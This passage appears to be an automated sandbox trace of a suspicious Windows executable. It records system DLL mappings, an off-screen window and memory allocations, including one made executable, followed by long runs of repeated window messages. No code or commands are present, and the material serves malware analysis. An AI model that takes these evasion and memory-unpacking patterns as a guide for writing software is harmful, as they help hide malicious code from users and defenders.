"onecorecommonproxystub.dll" filename = "\\Windows\\SysWOW64\\OneCoreCommonProxyStub.dll" (normalized: "c:\\windows\\syswow64\\onecorecommonproxystub.dll") Region: id = 1054 start_va = 0x71880000 end_va = 0x71c1cfff monitored = 0 entry_point = 0x71b979e0 region_type = mapped_file name = "onecoreuapcommonproxystub.dll" filename = "\\Windows\\SysWOW64\\OneCoreUAPCommonProxyStub.dll" (normalized: "c:\\windows\\syswow64\\onecoreuapcommonproxystub.dll") Region: id = 1068 start_va = 0x7fa70000 end_va = 0x7fe4cfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sysmain.sdb" filename = "\\Windows\\apppatch\\sysmain.sdb" (normalized: "c:\\windows\\apppatch\\sysmain.sdb") Thread: id = 1 os_tid = 0x176c [0268.328] GetCommandLineA () returned="\"C:\\Users\\OqXZRaykm\\Desktop\\asih.exe\" " [0268.328] GetModuleHandleA (lpModuleName=0x0) returned 0x500000 [0268.329] LoadIconA (hInstance=0x0, lpIconName=0x7f00) returned 0x1002b [0268.353] LoadCursorA (hInstance=0x0, lpCursorName=0x7f00) returned 0x10003 [0268.354] RegisterClassExA (param_1=0x505218) returned 0xc11d [0268.356] CreateWindowExA (dwExStyle=0x0, lpClassName="aroka", lpWindowName="wait", dwStyle=0x40000, X=-2680, Y=-6870, nWidth=542, nHeight=485, hWndParent=0x0, hMenu=0x0, hInstance=0x500000, lpParam=0x0) [0269.606] NtdllDefWindowProc_A (hWnd=0x60064, Msg=0x24, wParam=0x0, lParam=0x19fafc) returned 0x0 [0269.610] NtdllDefWindowProc_A (hWnd=0x60064, Msg=0x81, wParam=0x0, lParam=0x19faf0) returned 0x1 [0269.704] NtdllDefWindowProc_A (hWnd=0x60064, Msg=0x83, wParam=0x0, lParam=0x19fadc) returned 0x0 [0269.718] CreateWindowExA (dwExStyle=0x0, lpClassName="button", lpWindowName="turok", dwStyle=0x10000001, X=10, Y=10, nWidth=320, nHeight=40, hWndParent=0x60064, hMenu=0x2, hInstance=0x500000, lpParam=0x0) returned 0x0 [0269.718] GetLastError () returned 0x579 [0269.718] SendMessageA (hWnd=0x60064, Msg=0x111, wParam=0x0, lParam=0x37) returned 0x0 [0269.718] SendMessageA (hWnd=0x60064, Msg=0x111, wParam=0x0, lParam=0x36) returned 0xffffffff [0269.719] CreateFileA (lpFileName="last.inf" (normalized: "c:\\users\\oqxzraykm\\desktop\\last.inf"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0269.719] GetLastError () returned 0x2 [0269.720] CreateWindowExA (dwExStyle=0x0, lpClassName="edit", lpWindowName=0x0, dwStyle=0x40000000, X=10, Y=70, nWidth=500, nHeight=430, hWndParent=0x60064, hMenu=0x1, hInstance=0x500000, lpParam=0x0) returned 0x90052 [0269.762] NtdllDefWindowProc_A (hWnd=0x60064, Msg=0x210, wParam=0x10001, lParam=0x90052) returned 0x0 [0269.763] CreateWindowExA (dwExStyle=0x0, lpClassName="edit", lpWindowName="turok", dwStyle=0x40000001, X=10, Y=380, nWidth=166, nHeight=34, hWndParent=0x1, hMenu=0x2, hInstance=0x500000, lpParam=0x0) returned 0x0 [0269.763] GetLastError () returned 0x578 [0269.764] lstrcpyA (in: lpString1=0x5052b8, lpString2="Romantic" | out: lpString1="Romantic") returned="Romantic" [0269.764] CreateFontIndirectA (lplf=0x50529c) returned 0x510a08b6 [0269.765] SendMessageA (hWnd=0x60064, Msg=0x111, wParam=0x505044, lParam=0x38) returned 0x0 [0269.765] MoveWindow (hWnd=0x60064, X=-3700, Y=-3080, nWidth=540, nHeight=483, bRepaint=0) [0269.765] NtdllDefWindowProc_A (hWnd=0x60064, Msg=0x46, wParam=0x0, lParam=0x19f844) returned 0x0 [0269.766] NtdllDefWindowProc_A (hWnd=0x60064, Msg=0x24, wParam=0x0, lParam=0x19f4c4) returned 0x0 [0269.767] NtdllDefWindowProc_A (hWnd=0x60064, Msg=0x83, wParam=0x1, lParam=0x19f81c) returned 0x0 [0269.780] NtdllDefWindowProc_A (hWnd=0x60064, Msg=0x47, wParam=0x0, lParam=0x19f844) [0269.780] NtdllDefWindowProc_A (hWnd=0x60064, Msg=0x3, wParam=0x0, lParam=0xf417f194) returned 0x0 [0269.780] SendMessageA (hWnd=0x60064, Msg=0x111, wParam=0x505008, lParam=0x38) returned 0x0 [0269.781] GetWindowRect (in: hWnd=0x60064, lpRect=0x19f2f4 | out: lpRect=0x19f2f4) returned 1 [0269.781] SendMessageA (hWnd=0x60064, Msg=0x111, wParam=0x0, lParam=0x39) [0269.781] SendMessageA (hWnd=0x60064, Msg=0x111, wParam=0x0, lParam=0x3a) [0269.781] SendMessageA (hWnd=0x60064, Msg=0x111, wParam=0x0, lParam=0x3b) [0269.781] VirtualAlloc (lpAddress=0x400000, dwSize=0x6000, flAllocationType=0x2000, flProtect=0x1) returned 0x0 [0269.781] SendMessageA (hWnd=0x60064, Msg=0x111, wParam=0x0, lParam=0x3c) [0269.782] VirtualAlloc (lpAddress=0x0, dwSize=0x6000, flAllocationType=0x2000, flProtect=0x1) returned 0x550000 [0269.782] SendMessageA (hWnd=0x60064, Msg=0x111, wParam=0x0, lParam=0x3d) [0269.782] VirtualAlloc (lpAddress=0x0, dwSize=0x6000, flAllocationType=0x1000, flProtect=0x4) returned 0x560000 [0269.782] VirtualProtect (in: lpAddress=0x560000, dwSize=0x6000, flNewProtect=0x40, lpflOldProtect=0x50508e | out: lpflOldProtect=0x50508e*=0x4) returned 1 [0269.793] SendMessageA (hWnd=0x60064, Msg=0x111, wParam=0x0, lParam=0x3e) [0269.793] SendMessageA (hWnd=0x60064, Msg=0x111, wParam=0x0, lParam=0x579) [0269.794] SendMessageA (hWnd=0x60064, Msg=0x111, wParam=0x5052ec, lParam=0x40) [0269.794] SendMessageA (hWnd=0x60064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0269.794] SendMessageA (hWnd=0x60064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0269.794] SendMessageA (hWnd=0x60064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0269.795] SendMessageA (hWnd=0x60064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0269.795] SendMessageA (hWnd=0x60064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0269.795] SendMessageA (hWnd=0x60064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0269.795] SendMessageA (hWnd=0x60064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0269.795] SendMessageA (hWnd=0x60064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0269.795] SendMessageA (hWnd=0x60064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0269.795] SendMessageA (hWnd=0x60064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0269.795] SendMessageA (hWnd=0x60064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0269.796] SendMessageA (hWnd=0x60064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0269.796] SendMessageA (hWnd=0x60064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0269.796] SendMessageA (hWnd=0x60064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0269.796] SendMessageA (hWnd=0x60064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0269.796] SendMessageA (hWnd=0x60064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0269.796] SendMessageA (hWnd=0x60064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0269.797] SendMessageA (hWnd=0x60064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0269.797] SendMessageA (hWnd=0x60064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0269.797] SendMessageA (hWnd=0x60064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0269.797] SendMessageA (hWnd=0x60064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0269.797] SendMessageA (hWnd=0x60064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0269.797] SendMessageA (hWnd=0x60064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0269.798] SendMessageA (hWnd=0x60064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0269.798] SendMessageA (hWnd=0x60064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0269.798] SendMessageA (hWnd=0x60064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0269.798] SendMessageA (hWnd=0x60064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0269.798] SendMessageA (hWnd=0x60064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0269.798] SendMessageA (hWnd=0x60064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0269.798] SendMessageA (hWnd=0x60064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0269.799] SendMessageA (hWnd=0x60064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0269.799] SendMessageA (hWnd=0x60064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0269.799] SendMessageA (hWnd=0x60064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0269.799] SendMessageA (hWnd=0x60064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0269.799] SendMessageA (hWnd=0x60064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0269.799] SendMessageA (hWnd=0x60064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0269.799] SendMessageA (hWnd=0x60064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0269.800] SendMessageA (hWnd=0x60064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0269.800] SendMessageA (hWnd=0x60064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0269.800] SendMessageA (hWnd=0x60064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0269.800] SendMessageA (hWnd=0x60064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0269.800] SendMessageA (hWnd=0x60064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0269.800] SendMessageA (hWnd=0x60064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0269.801] SendMessageA (hWnd=0x60064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0269.801] SendMessageA (hWnd=0x60064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0269.801] SendMessageA (hWnd=0x60064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0269.801] SendMessageA (hWnd=0x60064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0269.801] SendMessageA (hWnd=0x60064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0269.801] SendMessageA (hWnd=0x60064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0269.801] SendMessageA (hWnd=0x60064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0269.802] SendMessageA (hWnd=0x60064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0270.007] SendMessageA (hWnd=0x60064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0270.007] SendMessageA (hWnd=0x60064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0270.007] SendMessageA (hWnd=0x60064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0270.007] SendMessageA (hWnd=0x60064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0270.007] SendMessageA (hWnd=0x60064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0270.007] SendMessageA (hWnd=0x60064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0270.008] SendMessageA (hWnd=0x60064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0270.008] SendMessageA (hWnd=0x60064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0270.008] SendMessageA (hWnd=0x60064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0270.008] SendMessageA (hWnd=0x60064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0270.008] SendMessageA (hWnd=0x60064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0270.008] SendMessageA (hWnd=0x60064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0270.008] SendMessageA (hWnd=0x60064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0270.008] SendMessageA (hWnd=0x60064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0270.009] SendMessageA (hWnd=0x60064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0270.009] SendMessageA (hWnd=0x60064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0270.009] SendMessageA (hWnd=0x60064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0270.009] SendMessageA (hWnd=0x60064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0270.009] SendMessageA (hWnd=0x60064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0270.009] SendMessageA (hWnd=0x60064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0270.009] SendMessageA (hWnd=0x60064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0270.009] SendMessageA (hWnd=0x60064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0270.010] SendMessageA (hWnd=0x60064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0270.010] SendMessageA (hWnd=0x60064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0270.010] SendMessageA (hWnd=0x60064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0270.010] SendMessageA (hWnd=0x60064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0270.010] SendMessageA (hWnd=0x60064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0270.010] SendMessageA (hWnd=0x60064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0270.010] SendMessageA (hWnd=0x60064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0270.011] SendMessageA (hWnd=0x60064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0270.011] SendMessageA (hWnd=0x60064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0270.011] SendMessageA (hWnd=0x60064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0270.011] SendMessageA (hWnd=0x60064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0270.011] SendMessageA (hWnd=0x60064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0270.011] SendMessageA (hWnd=0x60064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0270.011] SendMessageA (hWnd=0x60064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0270.012] SendMessageA (hWnd=0x60064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0270.012] SendMessageA (hWnd=0x60064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0270.012] SendMessageA (hWnd=0x60064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0270.012] SendMessageA (hWnd=0x60064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0270.012] SendMessageA (hWnd=0x60064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0270.012] SendMessageA (hWnd=0x60064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0270.012] SendMessageA (hWnd=0x60064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0270.013] SendMessageA (hWnd=0x60064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0270.013] SendMessageA (hWnd=0x60064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0270.013] SendMessageA (hWnd=0x60064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0270.013] SendMessageA (hWnd=0x60064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0270.013] SendMessageA (hWnd=0x60064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0270.013] SendMessageA (hWnd=0x60064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0270.013] SendMessageA (hWnd=0x60064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0270.014] SendMessageA (hWnd=0x60064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0270.014] SendMessageA (hWnd=0x60064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0270.014] SendMessageA (hWnd=0x60064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0270.014] SendMessageA (hWnd=0x60064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0270.014] SendMessageA (hWnd=0x60064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0270.014] SendMessageA (hWnd=0x60064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0270.014] SendMessageA (hWnd=0x60064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0270.015] SendMessageA (hWnd=0x60064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0270.015] SendMessageA (hWnd=0x60064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0270.015] SendMessageA (hWnd=0x60064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0270.015] SendMessageA (hWnd=0x60064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0270.015] SendMessageA (hWnd=0x60064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0270.015] SendMessageA (hWnd=0x60064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0270.015] SendMessageA (hWnd=0x60064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0270.016] SendMessageA (hWnd=0x60064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0270.016] SendMessageA (hWnd=0x60064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0270.016] SendMessageA (hWnd=0x60064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0270.016] SendMessageA (hWnd=0x60064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0270.016] SendMessageA (hWnd=0x60064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0270.016] SendMessageA (hWnd=0x60064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0270.017] SendMessageA (hWnd=0x60064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0270.017] SendMessageA (hWnd=0x60064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0270.017] SendMessageA (hWnd=0x60064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0270.017] SendMessageA (hWnd=0x60064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0270.017] SendMessageA (hWnd=0x60064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0270.017] SendMessageA (hWnd=0x60064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0270.017] SendMessageA (hWnd=0x60064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0270.017] SendMessageA (hWnd=0x60064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0270.018] SendMessageA (hWnd=0x60064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0270.018] SendMessageA (hWnd=0x60064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0270.018] SendMessageA (hWnd=0x60064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0270.018] SendMessageA (hWnd=0x60064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0270.018] SendMessageA (hWnd=0x60064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0270.018] SendMessageA (hWnd=0x60064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0270.019] SendMessageA (hWnd=0x60064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0270.019] SendMessageA (hWnd=0x60064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0270.019] SendMessageA (hWnd=0x60064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0270.019] SendMessageA (hWnd=0x60064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0270.019] SendMessageA (hWnd=0x60064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0270.019] SendMessageA (hWnd=0x60064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0270.019] SendMessageA (hWnd=0x60064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0270.019] SendMessageA (hWnd=0x60064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0270.020] SendMessageA (hWnd=0x60064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0270.020] SendMessageA (hWnd=0x60064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0270.020] SendMessageA (hWnd=0x60064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0270.020] SendMessageA (hWnd=0x60064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0270.020] SendMessageA (hWnd=0x60064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0270.031] SendMessageA (hWnd=0x60064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0270.031] SendMessageA (hWnd=0x60064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0270.031] SendMessageA (hWnd=0x60064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0270.031] SendMessageA (hWnd=0x60064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0270.031] SendMessageA (hWnd=0x60064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0270.031] SendMessageA (hWnd=0x60064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0270.032] SendMessageA (hWnd=0x60064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0270.032] SendMessageA (hWnd=0x60064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0270.032] SendMessageA (hWnd=0x60064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0270.032] SendMessageA (hWnd=0x60064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0270.032] SendMessageA (hWnd=0x60064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0270.032] SendMessageA (hWnd=0x60064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0270.032] SendMessageA (hWnd=0x60064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0270.032] SendMessageA (hWnd=0x60064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0270.033] SendMessageA (hWnd=0x60064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0270.033] SendMessageA (hWnd=0x60064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0270.033] SendMessageA (hWnd=0x60064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0270.033] SendMessageA (hWnd=0x60064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0270.033] SendMessageA (hWnd=0x60064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0270.033] SendMessageA (hWnd=0x60064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0270.033] SendMessageA (hWnd=0x60064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0270.034] SendMessageA (hWnd=0x60064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0270.034] SendMessageA (hWnd=0x60064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0270.034] SendMessageA (hWnd=0x60064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0270.034] SendMessageA (hWnd=0x60064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0270.034] SendMessageA (hWnd=0x60064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0270.034] SendMessageA (hWnd=0x60064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0270.034] SendMessageA (hWnd=0x60064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0270.035] SendMessageA (hWnd=0x60064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0270.035] SendMessageA (hWnd=0x60064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0270.035] SendMessageA (hWnd=0x60064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0270.035] SendMessageA (hWnd=0x60064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0270.035] SendMessageA (hWnd=0x60064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0270.035] SendMessageA (hWnd=0x60064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0270.035] SendMessageA (hWnd=0x60064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0270.035] SendMessageA (hWnd=0x60064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0270.036] SendMessageA (hWnd=0x60064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0270.036] SendMessageA (hWnd=0x60064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0270.036] SendMessageA (hWnd=0x60064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0270.037] SendMessageA (hWnd=0x60064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0270.037] SendMessageA (hWnd=0x60064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0270.037] SendMessageA (hWnd=0x60064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0270.037] SendMessageA (hWnd=0x60064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0270.037] SendMessageA (hWnd=0x60064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0270.037] SendMessageA (hWnd=0x60064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0270.037] SendMessageA (hWnd=0x60064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0270.038] SendMessageA (hWnd=0x60064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0270.038] SendMessageA (hWnd=0x60064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0270.038] SendMessageA (hWnd=0x60064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0270.038] SendMessageA (hWnd=0x60064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0270.038] SendMessageA (hWnd=0x60064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0270.038] SendMessageA (hWnd=0x60064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0270.038] SendMessageA (hWnd=0x60064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0270.039] SendMessageA (hWnd=0x60064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0270.039] SendMessageA (hWnd=0x60064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0270.039] SendMessageA (hWnd=0x60064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0270.039] SendMessageA (hWnd=0x60064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0270.039] SendMessageA (hWnd=0x60064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0270.039] SendMessageA (hWnd=0x60064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0270.039] SendMessageA (hWnd=0x60064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0270.040] SendMessageA (hWnd=0x60064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0270.040] SendMessageA (hWnd=0x60064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 [0270.040] SendMessageA (hWnd=0x60064, Msg=0x401, wParam=0x5052e4, lParam=0x166) returned 0x0 